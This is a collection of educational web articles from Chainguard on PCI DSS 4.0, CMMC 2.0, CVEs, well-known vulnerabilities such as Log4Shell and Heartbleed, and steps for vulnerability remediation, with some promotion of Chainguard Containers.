feature currently only supports the built-in pipelines (such as make, split and others) that can be found at the pkg/build/pipelines directory on the main project repository. --- ## Section: 3 ### Introduction to the PCI Data Security Standard (DSS) 4.0 URL: https://edu.chainguard.dev/software-security/compliance/pci-dss-4/intro-pci-dss-4/ Last Modified: August 21, 2024 Tags: compliance, PCI DSS 4.0, standards PCI DSS 4.0, or Payment Card Industry Data Security Standard, is a global standard in the payments industry that includes a set of foundational technical and operational requirements surrounding the protection of payment data. Its goal is to ensure the security of information involved when payment cards are used and while those payments are processed. PCI DSS 4.0 replaces the earlier PCI DSS 3.2.1, which was retired in March 2024. Cashless transactions have become the norm around the world. This is a convenient way for buyers and sellers to transact business. It has also attracted the attention of criminals looking for easy money. Payment account information, and especially payment card and card-owner data, are especially targeted. All payment system stakeholders have a responsibility to secure this information. PCI DSS helps to alleviate vulnerabilities and protect payment account data. This guide will provide a comprehensive overview of PCI DSS 4.0, detailing its practices, the importance of compliance, and practical guidance on meeting its requirements. At the end of this guide, you will learn how Chainguard Containers can be used to significantly reduce the toil and time needed to achieve PCI DSS 4.0 compliance. Who is Required to be Compliant? The PCI Security Standards Council (PCI SSC) is a global forum for the industry to come together to develop, enhance, disseminate, and assist with the understanding of security standards for payment account security. The standards developed are agreed upon by all members and provide a measure of mutual trust across the industry. The standards are not directly developed or required by governmental entities the PCI DSS is not a law, but compliance is enforced by the PCI SCC using an yearly assessment. Participation and membership in the PCI SSC is open globally to those affiliated with the payments industry. Compliance is expected of all members and validated using the PCI DSS 4.0 and is assessed using a set of defined testing procedures to verify requirements are met. Membership in the PCI SCC includes: Merchants Banks Processors Hardware and software developers Point of sale vendors Payment brands, such as Visa, Mastercard, and American Express Participation in the PCI SCC is encouraged for all industry stakeholders and is required for any who wish to participate in reviewing proposed additions or modifications to the standards. Regardless of membership status, all entities that store, process, or transmit cardholder data and/or sensitive authentication data are expected to comply with PCI DSS requirements. What is the Importance of Protecting Payment Account Data? Lax security enables criminals to steal and use consumer financial information from payment transactions and processing systems for fraudulent purposes. Vulnerabilities may appear anywhere in the card-processing ecosystem, including but not limited to: Point of sale devices Cloud-based systems Mobile devices, personal computers, and servers Wireless hotspots Web shopping applications Paper-based storage systems The transmission of cardholder data to service providers Remote access connections These vulnerabilities may also extend to systems operated by service providers, such as the financial institutions that initiate and maintain the relationships with merchants that accept payment cards. Compliance with PCI DSS helps to alleviate these vulnerabilities and protect payment account data. Impact of Non-Compliance PCI DSS is designed to protect both customers and entities that handle payment data. Beyond the following, a failure to comply leaves you and your customers vulnerable to data and financial losses, most of which are preventable. Further, any entity that handles covered data and does not comply with PCI DSS requirements can expect: Fines and penalties from contracted partners, such as payment processors Data breach compensation costs, beyond just the initial losses Legal action A damaged reputation These consequences may further result in cancelled contracts, additional revenue losses, and even closures. Achieving compliance with PCI DSS 4.0 is not just an industry self-regulatory requirement but a critical step in safeguarding payment information. To prepare your organization for PCI DSS 4.0, continue on to the next section of our guide, PCI DSS 4.0 Maturity Levels, or read about how Chainguard Containers can help simplify fulfilling PCI DSS 4.0 requirements. Browse all PCI DSS 4.0 Articles (Current article) Introduction to PCI DSS 4.0 Overview of PCI DSS 4.0 Practices/Requirements How Chainguard Can Help With PCI DSS 4.0 Get started with FIPS Chainguard Containers today! --- ### Introduction to the Cybersecurity Maturity Model Certification (CMMC) 2.0 URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/intro-cmmc-2/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards CMMC 2.0, or Cybersecurity Maturity Model Certification, is a cybersecurity framework established by the U.S. Department of Defense (DoD). It aims to ensure that contractors and subcontractors within the Defense Industrial Base (DIB) comply with rigorous cybersecurity standards. CMMC 2.0 replaces the previous CMMC model with a streamlined and updated version that incorporates lessons learned and feedback from industry stakeholders. If you are a contractor, subcontractor, or supplier contracting with the DoD, you will need to meet the requirements of CMMC 2.0 regardless of the size of your organization or the type of product or service you are providing. This guide will provide a comprehensive overview of CMMC 2.0, detailing its practices, the importance of compliance, and practical guidance on meeting its requirements. At the end of this guide, you will learn how Chainguard Containers can be used to significantly reduce the toil and time needed to achieve CMMC 2.0 compliance. Who is Required to be Compliant? CMMC 2.0 compliance is mandatory for all organizations involved in DoD contracts where Controlled Unclassified Information (CUI) and Federal Contract Information (FCI) is handled. This includes: Prime Contractors: Organizations directly awarded contracts by the DoD that must meet specific CMMC certification levels based on contract requirements. Subcontractors: Companies providing goods or services to prime contractors, especially if they handle or access CUI or FCI. Suppliers: Entities within the supply chain that interact with sensitive information relevant to DoD projects. The DIB encompasses a wide variety of contractors and suppliers, including commercial firms, not-for-profit research centers and university laboratories, and government-owned industrial facilities. The products and services these entities provide are even more diverse, ranging from large sophisticated weapons platforms (e.g., missile defense systems) to highly specialized operational support (e.g., satellite communications) to general commercial products (e.g., medical equipment). Regardless of the type of organization or the product or service they provide, all contractors servicing the DIB must achieve compliance with CMMC 2.0. However, as we will discuss more below, the compliance requirements vary according to the specific CMMC maturity level required for the contract in question. What Are FCI and CUI? FCI refers to information provided by or generated for the government under a contract that is not intended for public release. It includes data related to the performance of government contracts but does not involve classified or highly sensitive information. For example, an office furniture supplier providing delivery schedules and product specifications to a government agency under a contract would be handling FCI. CUI is more sensitive and requires specific safeguarding and dissemination practices. CUI includes information that, while not classified, still requires protection under federal laws, regulations, or government-wide policies due to its potential impact on national security or other critical interests. A defense contractor managing blueprints for a new military vehicle that is not classified but still needs to be protected under export control laws would be handling CUI. Impact of Non-Compliance Failure to comply with CMMC 2.0 can have several significant impacts: Contract Loss: Organizations that do not meet the required CMMC level will be ineligible for DoD contracts, leading to a loss of business opportunities and revenue. Reputational Damage: Non-compliance can damage an organization’s reputation, affecting relationships with clients and partners and potentially deterring future business opportunities. Legal and Financial Penalties: Organizations may face legal actions and financial penalties, especially if a security breach occurs involving sensitive information. Increased Risk: Non-compliance increases the risk of data breaches and cyberattacks, which can compromise organizational and client data. Achieving compliance with CMMC 2.0 is not just a regulatory requirement but a critical step in safeguarding national security and contracting with the DoD. To prepare your organization for CMMC 2.0, continue on to the next section of our guide, CMMC 2.0 Maturity Levels, or read about how Chainguard Containers can help simplify fulfilling CMMC 2.0 requirements. Browse all CMMC 2.0 Articles (Current article) Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels Overview of CMMC 2.0 Practice/Control Groups How Chainguard Can Help With CMMC 2.0 Get started with FIPS Chainguard Containers today! --- ### Sea-curing Software #1 - Fighting Vulnerabilities URL: https://edu.chainguard.dev/software-security/comics/fighting-vulnerabilities/ Last Modified: July 26, 2023 Tags: Comic, CVE --- ### What Are Software Vulnerabilities and CVEs? URL: https://edu.chainguard.dev/software-security/cves/cve-intro/ Last Modified: August 7, 2023 Tags: CVE, Overview A software vulnerability is a weakness in a program which, if left unaddressed, may be used by attackers to access, manipulate, or compromise a computer system. Vulnerabilities can be introduced at different stages of development and vary in their scope, criticality, and potential attack vector depending on their root cause. As a consequence, software developers spend time and resources triaging, remediating, and patching vulnerabilities to harden their software security and to prevent attackers from exploiting unintended program behavior. With software supply chain attacks on the rise, it is essential that developers and other technology professionals become knowledgeable about software vulnerabilities. Staying on top of the latest threats helps protect against targeted cyber attacks, ensuring the safety of important information and computer systems. Understanding software vulnerabilities is the first step in mitigating them in order to improve the security of the software you consume, develop, and release. In this article, you will be introduced to software vulnerabilities, examples of their causes and impacts, and learn how known vulnerabilities are documented through the CVE Program. What Makes a Vulnerability? Any party, process, or other input (like a dependency or package) involved in software production can introduce vulnerabilities into the final release. When third-party inputs used in development have software vulnerabilities, the resulting product may be impacted by them as well. Alternatively, developers writing their own code may unintentionally introduce vulnerabilities to a project through their programming, processes, or habits. If left unresolved, software weaknesses can advance to become vulnerabilities if hackers are able to exploit them via an attack. For example, not conducting input validation in a program could allow unfiltered or malicious input to affect the program, creating an improper input validation vulnerability. A notorious example of this is the Log4Shell vulnerability, which widely impacted many systems that used the Log4j logging utility. Attackers may target software vulnerabilities if they see an opportunity to compromise sensitive data or systems for their own benefit. They may choose to prioritize some vulnerabilities over others depending on how lucrative and accessible the opportunity is. Malicious actors can approach a vulnerability from different attack vectors depending on the weakness type being targeted. In some cases, attack vectors are easier to reach, meaning less leverage is required to expose and exploit the software’s weaknesses. The CVE Program Founded by the MITRE Corporation in 1999, the CVE Program was established with the goal to collect and document information surrounding known vulnerabilities in software products. Standing for Common Vulnerabilities and Exposures, CVEs are records of publicly disclosed software vulnerabilities. Over time, the program catalog has expanded to include over 200,000 software vulnerabilities, with more being added every day. The CVE Program is supported by the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA). In addition, the CVE Program feeds the U.S. National Vulnerability Database (NVD), which provides additional information for each CVE entry. What Is a CVE? A CVE entry represents a known weakness in a software product and contains information to help address any potential risks to the integrity of a system caused by the vulnerability. Each CVE is assigned a unique CVE ID and is recorded with a description of the vulnerability, a list of affected software releases, any relevant references, and other pertinent information. CVE Numbering Authorities (CNAs) are the entities responsible for assigning CVE IDs. CNAs can be software vendors, research groups, open source sponsors, and similar organizations. When a new vulnerability is discovered and reported to a CNA, the CNA will request that a CVE ID is reserved for it. Once reserved, details are added to the CVE record and the entry is published to the database. Related Software Vulnerability Efforts While the CVE Program database functions stand-alone to communicate known vulnerabilities with developers, a variety of related efforts provide additional information and context to support the database. The Common Vulnerability Scoring System, or CVSS, is a metric which helps assess the severity of any given vulnerability and serves as a tool for developers who are determining which CVEs to address first. Similar to the CVE Program, MITRE also supports the Common Weaknesses Enumeration, or CWE. The CWE catalogs product-unspecific types of software weaknesses which may produce vulnerabilities if present in a program. The U.S. National Vulnerability Database (NVD) connects to the CVE database to provide further information regarding CVE entries. The NVD provides additional references and public advisories regarding each vulnerability. It also connects each CVE with a CVSS score, links a vulnerability’s associated CWE(s), and reports whether it is in the CISA’s Known Exploited Vulnerabilities (KEV) catalog. Learn More In this article, you were introduced to software vulnerabilities, learned about their characteristics, and how they are tracked in the CVE Program catalog. This understanding will help you to start triaging and addressing vulnerabilities present in the software you produce or consume to limit the potential for attackers to successfully exploit your systems. To learn more about software vulnerabilities, you can visit the CVE Program website, explore the NVD, or take a look at the KEV catalog. You can also check out our other articles on why you should care about vulnerabilities in your software, infamous software vulnerabilities, and our guide to addressing vulnerabilities in your software. --- ### CMMC 2.0 Maturity Levels URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-2-levels/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards The Cybersecurity Maturity Model Certification (CMMC) 2.0 integrates various cybersecurity standards and best practices into a unified model that encompasses three maturity levels. Each level builds upon the previous one, with increasing rigor in cybersecurity practices and processes. In this article, we’ll provide an overview of the three levels of maturity and example practices that are representative of their requirements. Level 1: Foundational Contractors and subcontractors who handle only Federal Contract Information (FCI) typically need this level of certification. This is particularly relevant for small businesses that provide basic products or services without dealing with sensitive information. For example, a company supplying standard office supplies to a government agency would fall under this category. The focus at this level is on maintaining basic safeguards by implementing 17 fundamental cybersecurity practices. These practices are primarily derived from the Federal Acquisition Regulation (FAR) 52.204-21, a set of rules for government procurement in the United States. They are designed to protect FCI by ensuring that essential, straightforward protections are in place. Documentation Requirements At Level 1, the documentation requirements are minimal, focusing on basic cyber hygiene through the implementation of 17 foundational cybersecurity practices. The purpose is to establish essential protections without the need for extensive documentation. For example, organizations may maintain basic policies and procedures for access control, media protection, and physical security, along with records of security awareness training. The emphasis at this level is on demonstrating that these fundamental practices are in place, rather than producing detailed documentation, as required in higher levels. Example Level 1 Practices Limiting information system access to authorized users. Conducting background checks on employees. Implementing basic measures such as antivirus and firewalls. Level 2: Advanced Contractors and subcontractors who handle Controlled Unclassified Information (CUI) but are not involved in critical defense programs typically need Level 2 certification. This is relevant for companies involved in more complex projects that deal with sensitive, though not highly classified, data. For instance, a contractor providing technical support for military communication systems, where sensitive but not classified information is exchanged, would require this level. Level two consists of implementing a subset of the security requirements specified in NIST SP 800-171, totaling 110 practices. This level is designed as a transitional step for organizations aiming to achieve Level 3, building upon the foundational practices established in Level 1. Documentation Requirements At Level 2, the documentation requirements are moderate, reflecting the need for intermediate cyber hygiene and addressing a subset of the NIST SP 800-171 requirements. Organizations must maintain a System Security Plan (SSP) that outlines security strategies and vulnerability assessment and remediation plans. They must also create a Plan of Action and Milestones (POA&M) addressing any aspects of the organization which are note yet implemented. Other Level 2 documentation requirements may include audit logs, incident response reports, inventory of the organization’s systems, location of Controlled Unclassified Information (CUI) in the organization’s environment, and other documents related to the implementation and management of cybersecurity practices. Example Level 2 Practices Implementing multifactor authentication. Conducting regular vulnerability assessments. Establishing and maintaining an operational incident-handling capability for organizational systems. Level 3: Expert Contractors handling highly sensitive CUI and involved in critical defense programs typically require this level of certification. This applies to large defense contractors developing advanced military technologies, such as a company designing next-generation fighter jets for the DoD. The focus at this level is on advanced and proactive cyber hygiene, requiring organizations to implement all 110 practices from NIST SP 800-171, along with additional practices from a subset of NIST SP 800-172. This level demands advanced security measures to protect CUI against advanced persistent threats (APTs), such as cyber-espionage campaigns, zero-day exploits, and coordinated attacks targeting vulnerabilities in critical infrastructure. It requires three government-led assessments a year to maintain compliance. Documentation Requirements Level 3 requires the same documentation requirements as Level 2, including the System Security Plan (SSP) and Plan of Action and Milestones (POA&M). Further documentation requirements will be clear once the DoD determines which additional practices from NIST SP 800-172 will also be required. Example Level 3 Practices At the time of publication, specific Level 3 practices are still being determined. However, the Department of Defense has indicated that they will be pulled from a subset of NIST SP 800-172, Enhanced Security Requirements for Protecting Controlled Unclassified Information. Each CMMC level builds upon the previous one, ensuring that as organizations progress through the levels, their cybersecurity posture becomes more robust and capable of addressing increasingly sophisticated threats. This tiered approach allows organizations of varying sizes and capabilities to incrementally improve their cybersecurity measures while meeting the specific requirements necessary to handle sensitive information. To learn more about the specific required practices of CMMC 2.0, continue to the Overview of CMMC 2.0 Practice/Control Groups. Browse all CMMC 2.0 Articles Introduction to CMMC 2.0 (Current article) CMMC 2.0 Maturity Levels Overview of CMMC 2.0 Practice/Control Groups How Chainguard Can Help With CMMC 2.0 Get started with Chainguard FIPS Images today! --- ### Why Care About Software Vulnerabilities? URL: https://edu.chainguard.dev/software-security/cves/cve-why-care/ Last Modified: July 25, 2023 Tags: CVE, Overview Software products are prone to vulnerabilities which, if exploited by an attacker, may negatively impact the systems and consumers relying on them. Attacks against vulnerable software systems can result in the unintended exposure and misuse of sensitive data (like the theft of user account credentials). In other cases, these attacks could affect the provision of a service, or compromise critical infrastructure that relies on the software. Given the considerable threat that they can pose, it is important that developers spend time mitigating vulnerabilities to protect against hackers seeking to exploit them. Addressing the vulnerabilities present in your software helps secure the systems you support, use, and maintain. In this article, you will explore why you should care about vulnerabilities as a software developer, and learn about federal regulations that draw importance to CVE management. As a Developer Discovering and mitigating software vulnerabilities is a difficult – but necessary – task for developers to tackle. Development teams are ultimately the authorities who are able to remediate vulnerabilities at the source. Depending on the severity of a vulnerability, its exploitation could significantly impact the integrity of the software product. The trust, safety, and operations of the consumers who rely on the software may be affected as well. Vulnerability triage is an important step developers must take to work toward reducing risks posed by vulnerabilities in their software. Using vulnerability scanners can give developers information about the number, type, and severity of CVEs present in their work. With this data, developers can prioritize critical CVEs, therefore ensuring that major security concerns are addressed first. Federal Regulations With notable software supply chain security attacks occurring in recent years (such as the SolarWinds attack in 2020), the U.S. federal government has increased efforts to improve U.S. cybersecurity. These initiatives aim to strengthen software supply chain security by promoting safer development habits, such as frequent vulnerability scanning. FedRAMP The Federal Risk and Authorization Management Program (FedRAMP) is a security framework that must be adopted by cloud service providers (CSPs) before they service U.S. federal government agencies. The framework aims to promote the use of cloud services across agencies by standardizing security authorization practices. Based on the service being offered, FedRAMP sorts cloud services into low, moderate, and high impact levels, with increased security expectations for each level. In order to achieve FedRAMP authorization, certain requirements need to be met as follows: Container images used by CSPs must be hardened according to benchmarks laid out in the NIST SP 800-70. Our solution is Chainguard Containers, which offers hardened, minimal base images designed to help you meet FedRAMP compliance requirements. Vulnerability scanners are expected to report information about discovered vulnerabilities, such as its CVE ID and CVSSv3 score. Additional configuration requirements can be found in the FedRAMP Vulnerability Scanning Requirements outline. Meeting FedRAMP container image and vulnerability scanning requirements allows your organization to expand and reinforce its offerings as a CSP. To learn how we can help you meet FedRAMP container image requirements, check out our blog post on how you can Fortify, comply and conquer FedRAMP with Chainguard Containers. DHS Software Self Attestation The Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) released their Secure Software Attestation Form in response to Executive Order 14028. The attestation form identifies the secure software development practices that developers must verify to have met in order for their software to be utilized by federal agencies. Meeting the criteria laid out by the form is another critical step toward securing your software development processes. Learn More In this article, we discussed reasons why you should care about software vulnerabilities from a development perspective. In addition, you were introduced to federal regulations that draw importance to vulnerability management and secure development practices. This knowledge will help you begin managing vulnerabilities present in the software you develop, improving your security profile and giving you a head start toward meeting regulations like FedRAMP. To learn more about the importance of software vulnerability management and meeting federal regulations, you can explore requirements for complying with FedRAMP, or learn how Chainguard Containers can help reduce CVEs in your container images. --- ### Overview of PCI DSS 4.0 Practices/Requirements URL: https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-practices/ Last Modified: August 21, 2024 Tags: compliance, PCI DSS 4.0, standards PCI DSS 4.0, or Payment Card Industry Data Security Standard is intended for all entities that store, process, or transmit cardholder data and/or authentication data that could impact the security of the cardholder data environment. This includes all entities interacting with information such as the following: Cardholder Data Primary account number Cardholder name Expiration data Authentication Data Full track data, such as on a magnetic stripe or chip Card verification code (the number on the back) PINs PCI DSS 4.0 requires compliance with a set of requirements, each related to an information security practice or goal. All of these are intended to protect cardholder data from theft and fraud. PCI DSS 4.0 Goals and Requirements Below is a table overview with a high-level description of the goals and requirements, summarized from the PCI DSS v4.0 Quick Reference Guide from the PCI Security Standards Council, available from their Document Library: Goals Requirements Build and maintain a secure network and systems Install and maintain network security controls and apply secure configurations to all system components Protect account data Protect stored account data as well as during transmission over open, public networks Maintain a vulnerability management program Protect all systems and networks from malicious software, develop and maintain secure systems and software Implement strong access control measures Restrict access to system components and cardholder data y business need to know, identify users and authenticate access to system components, restrict physical access to cardholder data Regularly monitor and test networks Log and monitor all access to system components and cardholder data, test security of all systems regularly Maintain an information security policy Support information security with organizational policies and programs For a list of all required practices, see the PCI DSS documentation available in the PCI Security Standards Council’s Document Library. Browse all PCI DSS 4.0 Articles Introduction to PCI DSS 4.0 (Current article) Overview of PCI DSS 4.0 Practices/Requirements How Chainguard Can Help With PCI DSS 4.0 Get started with Chainguard FIPS Images today! --- ### Overview of CMMC 2.0 Practices/Control Groups URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-practices/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards Cybersecurity Maturity Model Certification (CMMC) 2.0 requires a progressive set of practices. Level 1 has 17 practices. Level 2 includes Level 1 practices plus an additional 110 practices. Level 3 practices include Level 2 practices, plus additional practices that are still being determined. These practices are divided into 14 domains, each of which covers a different aspect of cybersecurity. Wait, you may be wondering. Are “practices” the same as “controls” or “requirements?” This can be a point of confusion, as CMMC 2.0 refers to its requirements as “practices”, yet the majority are taken from NIST SP 800-171 and NIST SP 800-172 standards or requirements. Naming Conventions for CMMC 2.0 Practices/Controls CMMC 2.0 practices are labeled using the format “DD.L#-REQ”, where: DD is the two-letter domain abbreviation L# is the level number REQ is the NIST SP 800-171 Rev 2 or NIST SP 800-172 security requirement number CMMC 2.0 Practice/Control Domains Below is a table overview of the domains: Domain Description Example Practice/Control Access Control (AC) Manage and restrict access to information systems to ensure that only authorized users and processes can interact with the system, protecting sensitive data from unauthorized access. AC.L1-3.1.22 - Control information posted or processed on publicly accessible information systems. Awareness and Training (AT) Ensure that personnel are educated on cybersecurity practices and aware of their roles in maintaining security, improving overall organizational resilience against cyber threats. AT.L2-3.2.3 - Provide security awareness training on recognizing and reporting potential indicators of insider threat. Audit and Accountability (AU) Involve the logging and monitoring of system activities to track and review actions, ensuring accountability and providing a means to detect and respond to potential security incidents. AU.L2-3.3.2 - Ensure that the actions of individual system users can be uniquely traced to those users so they can be held accountable for their actions. Configuration Management (CM) Establish and maintain secure configurations for information systems to prevent vulnerabilities, ensuring that systems are set up and managed in a consistent and secure manner. CM.L2-3.4.2 - Establish and enforce security configuration settings for information technology products employed in organizational systems. Identification and Authentication (IA) Focus on verifying the identity of users and devices to ensure that only authorized individuals and systems can access or interact with the organization’s information assets. IA.L2-3.5.5 - Prevent reuse of identifiers for a defined period. Incident Response (IR) Prepare for and respond to cybersecurity incidents through structured plans and regular testing, ensuring that the organization can effectively manage and mitigate the impact of incidents. IR.L2-3.6.2 - Track, document, and report incidents to designated officials and/or authorities both internal and external to the organization. Maintenance (MA) Maintain and update systems, ensuring that maintenance activities are performed securely. MA.L2-3.7.1 - Perform maintenance on organizational systems. Media Protection (MP) Protect information stored on physical and digital media through encryption and other security measures to safeguard data from unauthorized access and exposure. MP.L2-3.8.2 - Limit access to Controlled Unclassified Information (CUI) on system media to authorized users. Personnel Security (PS) Manage security risks related to personnel by ensuring thorough background checks and security clearances, addressing potential vulnerabilities from insider threats. PS.L2-3.9.1 - Screen individuals prior to authorizing access to organizational systems containing CUI. Physical Protection (PE) Protect physical locations and systems through access controls, surveillance, and other security measures to prevent unauthorized physical access and potential tampering. PE.L1-3.10.3 - Escort visitors and monitor visitor activity. Risk Assessment (RA) Assess and remediat risks and vulnerabilities in organizational operations, assets, and systems. RA.L2-3.11.2 - Scan for vulnerabilities in organizational systems and applications periodically Security Assessment (CA) Evaluate the effectiveness of security controls through assessments and address any identified vulnerabilities to continuously improve the security posture. CA.L2-3.12.1 - Periodically assess the security controls in organizational systems to determine if the controls are effective in their application. System and Communications Protection (SC) Secure communications and data transmitted across networks to protect information from interception and unauthorized access. SC.L2-3.13.3 - Separate user functionality from system management functionality. System and Information Integrity (SI) Ensure the integrity of systems and information by monitoring for unauthorized changes, protecting against malicious code, and applying updates to maintain system security. SI.L2-3.14.7 - Identify unauthorized use of organizational systems. For a list of all required practices, see pages 9 to 18 in the Cybersecurity Maturity Model Certification - Model Overview published by Carnegie Mellon University and The Johns Hopkins University Applied Physics Laboratory LLC and funded by the Department of Defense (DoD). To learn more about requirements for tracking compliance, continue to the next article in our guide, CMMC 2.0 Documentation Requirements Browse all CMMC 2.0 Articles Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels (Current article) Overview of CMMC 2.0 Practice/Control Groups How Chainguard Can Help With CMMC 2.0 Get started with Chainguard FIPS Images today! --- ### Infamous Software Vulnerabilities URL: https://edu.chainguard.dev/software-security/cves/infamous-cves/ Last Modified: July 26, 2023 Tags: CVE, Overview Software vulnerabilities vary in their severity – some are difficult to exploit and have minimal implications, while others can be exploited easily, giving an attacker significant leverage over a computer system. In cases where widely-implemented software contains high-severity vulnerabilities, the damage caused by their exploitation can affect millions of developers and services worldwide. In this article, you will learn how the KEV Catalog tracks known exploited software vulnerabilities, and how it serves as a tool for developers and federal agencies. In addition, you will explore Log4Shell, Heartbleed, and Shellshock, three infamous software vulnerabilities which have had major impacts on software security worldwide. CISA KEV Catalog The U.S. Cybersecurity and Infrastructure Security Agency (CISA) operates the Known Exploited Vulnerabilities (KEV) Catalog, which is populated with CVEs that have existing exploits “in the wild”. The KEV Catalog serves as a tool for developers as it identifies CVEs that need to be prioritized for remediation because of their exploitability status. Federal civilian executive branch agencies must remediate vulnerabilities present in the KEV Catalog by a due date specified by the CISA. Focusing on patching out these vulnerabilities limits the ability of attackers to find a potential known route into a system. Some of the vulnerabilities in the KEV Catalog are infamous for the impacts of their exploitation. When a vulnerability affects a piece of software present in an array of systems, its exploitation can reach far and wide, and efforts to remediate it can be difficult to fully implement. The following vulnerabilities are present in the KEV Catalog and serve as examples of how damaging ubiquitous software vulnerabilities can be. Log4Shell (CVE-2021-44228) Log4Shell is a vulnerability impacting the Apache Log4j Java logging utility, a popular library used on millions of devices worldwide. The vulnerability allows an attacker to perform a remote code execution (RCE) attack by logging code that runs a Java Naming and Directory Interface (JNDI) endpoint lookup. An attacker can exploit this behavior by performing a JNDI lookup to a server under their control containing malicious code. This vulnerability has affected Log4j since version 2.0-beta9 (released in 2013), and was patched out in version 2.16.0 in 2021. Due to the popularity of Log4j, Log4Shell was extremely pervasive, impacting a variety of services such as those offered by Amazon Web Services and IBM, among others. Its widespread use makes this vulnerability difficult to completely remediate as it may be unknown if a vulnerable version of Log4j is present on a system, such as in the case of a federal network being affected months after the vulnerability was first documented. To learn more about Log4Shell, check out its listing on the Apache Log4j Security Vulnerabilities page. Heartbleed (CVE-2014-0160) Heartbleed is a buffer over-read vulnerability in OpenSSL, a popular cryptographic library commonly used for encrypting SSL/TLS communications on the internet. The vulnerability allows an attacker to read the memory of a system without detection. As a result, cryptographic keys, credentials, and other content can be silently extracted from a server’s memory. Heartbleed affected OpenSSL versions 1.0.1-1.0.1f (inclusive) and was discovered in 2014, about two years after the vulnerability was first introduced to OpenSSL. Due to its undetectable nature, determining if it was exploited against a particular server is difficult. It was estimated at the time of discovery that around half a million websites may have been vulnerable to the bug. To learn more about the Heartbleed vulnerability, check out the Heartbleed website. Shellshock (CVE-2014-6271) Shellshock is an arbitrary code execution vulnerability which went unnoticed for 25 years, existing in Bash since 1989 and first being reported in version 4.3 in 2014. Through this vulnerability, commands that should be inaccessible can instead be executed through Bash’s function export feature. In affected versions, Bash processes function definitions stored in environment variables, causing the unintended behavior that enables malicious code to be run. Following the initial CVE report, further CVEs were soon filed addressing additional related vulnerabilities. As Shellshock was not discovered for over two decades after its inception, the scope of its influence is significant, with it still being leveraged against systems today. Soon after the vulnerability was uncovered, large-scale attacks using botnets were deployed against high-profile entities like the U.S. Department of Defense. To learn more about Shellshock and its related vulnerabilities, check out the CISA’s Shellshock alert. Learn More In this article, you learned how the CISA’s KEV Catalog tracks exploited vulnerabilities, and how the catalog is used by developers and federal agencies to prioritize vulnerability remediation. You also explored three infamous software vulnerabilities: Log4Shell, Heartbleed, and Shellshock, and learned how they have impacted systems across the world. To learn more about these vulnerabilities and other exploited vulnerabilities, dive further into the KEV Catalog, or check out the full CVE database. --- ### Software Vulnerability Remediation URL: https://edu.chainguard.dev/software-security/cves/cve-remediation/ Last Modified: August 10, 2023 Tags: CVE, Overview At worst, a software vulnerability can impose a critical security flaw that warrants attention. Developers care about mitigating software vulnerabilities because their presence may harm the integrity of their product, negatively affect downstream users, or slow down efforts toward meeting regulatory requirements. However, modern software development practices which incorporate third-party packages in addition to newly scripted code can complicate the vulnerability remediation process. Keeping track of how and where vulnerabilities are introduced, as well as what introduced them, is an arduous task when multitudes of dependencies are working together. In this article, you will explore some steps you can take to make vulnerability remediation easier from start to finish. You will begin by learning how various tools can help you catalog the components of your software. Next, you will move on to identifying, triaging, and remediating vulnerabilities, and learn how to address vulnerabilities present in container images. Step 1 — Knowing Your Software Vulnerability remediation can be difficult when your code incorporates a wide array of packages. On top of this, projects often rely on dependencies which have their own dependencies (called transitive dependencies), thus further adding to the layers which compose a piece of software. When working on large-scale projects with hundreds of files, dependencies, and collaborators, keeping track of everything can become overwhelming. To combat this, an SBOM, or Software Bill of Materials, can be used. SBOMs are machine-readable documents that track the dependencies of a project. A good SBOM includes dependency names and their version numbers, enabling accurate identification of every component. By using an SBOM to catalog project dependencies, you can gain insight into the many inputs comprising a piece of software. In addition to generating an SBOM for your project, you can take your software security one step further with the use of attestations, which guarantee the provenance of a software artifact. Establishing provenance of an artifact ensures that it has not been altered after generation, enabling trust and confidence in its composition. To learn more about using SBOMs and attestations to secure your software supply chain, check out our article comparing the two options. Step 2 — Vulnerability Scanning After taking steps to understand and catalog your software components, you can move on to scanning for vulnerabilities. A vulnerability scanner is a tool which ingests databases of known software vulnerabilities (most notably the National Vulnerability Database database) and scans your software to determine if any reported vulnerabilities may be present. Having an SBOM generated for your software can streamline this process, as the SBOM itself can be scanned to determine if you’re running any packages affected by vulnerabilities. A couple examples of open source vulnerability scanners that you can use are as follows: Trivy is a jack-of-all-trades project that can scan a variety of targets including containers, filesystems, and remote Git repositories. Grype integrates with Syft, an SBOM generation tool, making it easier to generate and then scan an SBOM for your software. Step 3 — Triage After identifying what vulnerabilities may be present in your software, you can begin triaging them. Vulnerability triage is the process of sorting and prioritizing which vulnerabilities need to be addressed first. There are a few factors to be considered when triaging, including false positive vulnerabilities, vulnerability severity, and exploitability status. False positives - Though vulnerability scanners may find and report a CVE for a given dependency, it may not be present in your software. If the vulnerability is outside of your program’s scope (for example, in a function that you are not calling) then the vulnerability may not truly impact your application, and you do not need to spend time addressing it. Vulnerability severity – CVEs are assigned a Common Vulnerability Scoring System (CVSS) score to assess the severity of their impacts if exploited. A CVE with a CVSS score of critical may have serious consequences to the confidentiality, integrity, and availability of a system, making it a priority to remediate. In comparison, a CVE with a low severity score may be difficult to exploit or has minimal impact, so it can be remediated after higher priorities are addressed. Exploitability status – Not all vulnerabilities have been observed to be exploited. Checking to see if a vulnerability is in the Known Exploited Vulnerabilities (KEV) Catalog can tell you if there is an active attacker threat “in the wild” for vulnerabilities present in your software. Note that a vulnerability’s absence from the KEV Catalog does not mean it won’t be exploitable, as unreported or unobserved attacks on a vulnerability may still exist (or may occur in the future). Vulnerability Exploitability eXchange (VEX) documents can be helpful references when triaging vulnerabilities. VEX is a model which allows software developers to report the status of vulnerabilities in a software product to inform downstream users of what actions they should take to address them. If a scanner reports a vulnerability in a product, a VEX document can elaborate on how the vulnerability truly impacts it. To learn more about how you can use VEX, check out OpenVEX, an open source implementation of VEX that you can leverage when generating or ingesting VEX documents. Step 4 — Remediation Once you have triaged the vulnerabilities found in your software, you can move on to remediating them. Vulnerability remediation is the act of correcting and removing CVEs from your software. Using a CVE ID, you can check sources such as the National Vulnerability Database (NVD) for advisories regarding a vulnerability. 